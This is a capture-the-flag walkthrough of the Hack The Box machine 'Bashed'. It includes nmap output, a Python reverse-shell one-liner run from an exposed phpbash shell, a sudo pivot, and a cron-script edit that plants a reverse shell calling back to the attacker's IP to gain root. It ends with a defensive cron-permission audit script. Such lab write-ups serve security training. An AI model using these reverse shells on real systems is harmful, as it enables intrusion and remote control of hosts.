Redhalo

Hack The Box walkthrough – Bashed machine

Today, a new walkthrough of the Hack The Box machine Bashed.

It is an easy Linux machine released in December 2017, created by Arrexel.

Let’s jump in!

ENUMERATION

As usual, we start with an nmap scan to find out what we are dealing with today:

[email protected]:~/Documents$ nmap -sC -sV -oA nmap 10.129.66.213
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-11 15:58 EST
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 33.70% done; ETC: 16:01 (0:01:54 remaining)
Nmap scan report for 10.129.66.213
Host is up (1.0s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 143.57 seconds

It seems we have only an Apache web service running on port 80. Let’s have a look:

It seems to be a site about Arrexel’s development progress. Nothing interesting so far.

Let’s run a dirbuster scan to see if other pages can be found:

I found two interesting files in the dev folder: phpbash.min.php and phpbash.php. Let’s have a look:

Looks like we already have our shell!

I still prefer a shell through netcat, so I start a listener and run the following from phpbash:

nc -lvnp 1337
export RHOST="10.10.14.105";export RPORT=1337;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

FOOTHOLD

Running sudo -l, I found out I am able to run commands as scriptmanager with sudo:

www-data@bashed:/var/www/html/dev$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

With the following command I was able to spawn a shell as scriptmanager:

www-data@bashed:/var/www/html/dev$ sudo -u scriptmanager /bin/bash
sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/var/www/html/dev$ id
id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)

PRIVILEGE ESCALATION

The linpeas enumeration output shows an uncommon folder “scripts” at the filesystem root.

There are 2 files inside:

scriptmanager@bashed:/scripts$ ls -al
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Dec 13 13:41 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager 1039 Dec 13 13:41 test.py
-rw-r--r--  1 root          root             8 Dec 13 15:00 test.txt
scriptmanager@bashed:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing123!")
f.close

scriptmanager@bashed:/scripts$ cat test.txt
scriptmanager@bashed:/scripts$ 

It appears that the Python script is executed by root every minute to write the file test.txt (test.txt is owned by root while test.py is owned by scriptmanager).

Therefore, I edited the script to add a reverse shell:

scriptmanager@bashed:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing2")
f.close

import socket # For Building TCP Connection
import subprocess # To start the shell in the system

def connect():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # start a socket object 's' 
    s.connect(('10.10.14.105', 4242)) # Here we define the Attacker IP and the listening port

    while True: # keep receiving commands from the Kali machine
        command = s.recv(1024) # read the first KB of the tcp socket

        if 'terminate' in command: # if we got terminate order from the attacker, close the socket and break the loop
            s.close()
            break 

        else: # otherwise, we pass the received command to a shell process

            CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            s.send( CMD.stdout.read() ) # send back the result
            s.send( CMD.stderr.read() ) # send back the error -if any-, such as syntax error

def main ():
    connect()
main()

scriptmanager@bashed:/scripts$ 
nc -lvnp 4242

After waiting one minute… I am root!

[email protected]:~/Documents$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.10.14.105] from (UNKNOWN) [10.129.42.84] 58776
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
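The escalation works because a script that root's cron runs every minute lives in a directory owned by scriptmanager and is itself owned by scriptmanager, so a low-privileged user controls what root executes. As an added example (not code from the write-up), here is a Python 3 audit that flags root cron jobs whose script, or the directory holding it, can be modified by a non-root user. The crontab line and the fake filesystem are constructed: the page never shows the real crontab, and the ownership and modes are taken from the `ls -al /scripts` listing above.

```python
import os
import re
import stat
from types import SimpleNamespace

# System crontab format: minute hour day month weekday USER command
CRON_LINE = re.compile(r"^\s*(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")

def script_path(cmd):
    # First absolute path in the command, e.g. /scripts/test.py in "python /scripts/test.py"
    return next((tok for tok in cmd.split() if tok.startswith("/")), None)

def modifiable_by_non_root(st):
    # A non-root user can change the object if they own it or group/other have write access
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def find_risky_root_jobs(crontab_text, stat_fn=os.stat):
    # Returns (path, reason) for every root job whose script or containing directory a non-root user could modify
    findings = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment or environment assignment such as PATH=...
        m = CRON_LINE.match(line)
        if not m or m.group("user") != "root":
            continue
        path = script_path(m.group("cmd"))
        if path is None:
            continue
        for target, kind in ((path, "script"), (os.path.dirname(path), "directory")):
            try:
                st = stat_fn(target)
            except OSError:
                continue  # missing target: nothing to check here
            if modifiable_by_non_root(st):
                findings.append((target, "%s owned by uid %d, mode %s" % (kind, st.st_uid, oct(stat.S_IMODE(st.st_mode)))))
    return findings

# Constructed sample (not the machine's real crontab): a root job like the one the write-up infers,
# plus stat results taken from the `ls -al /scripts` listing in the write-up
SAMPLE_CRONTAB = "SHELL=/bin/sh\n# m h dom mon dow user command\n* * * * * root python /scripts/test.py\n"
FAKE_FS = {
    "/scripts/test.py": SimpleNamespace(st_uid=1001, st_mode=0o100644),  # -rw-r--r-- scriptmanager
    "/scripts": SimpleNamespace(st_uid=1001, st_mode=0o040774),          # drwxrwxr-- scriptmanager
}

def fake_stat(path):
    if path not in FAKE_FS:
        raise FileNotFoundError(path)
    return FAKE_FS[path]
```

Calling `find_risky_root_jobs(open("/etc/crontab").read())` on a real host uses `os.stat` and reports both findings for a layout like the one on Bashed; the fix is to make the script and its directory root-owned and not group/other writable.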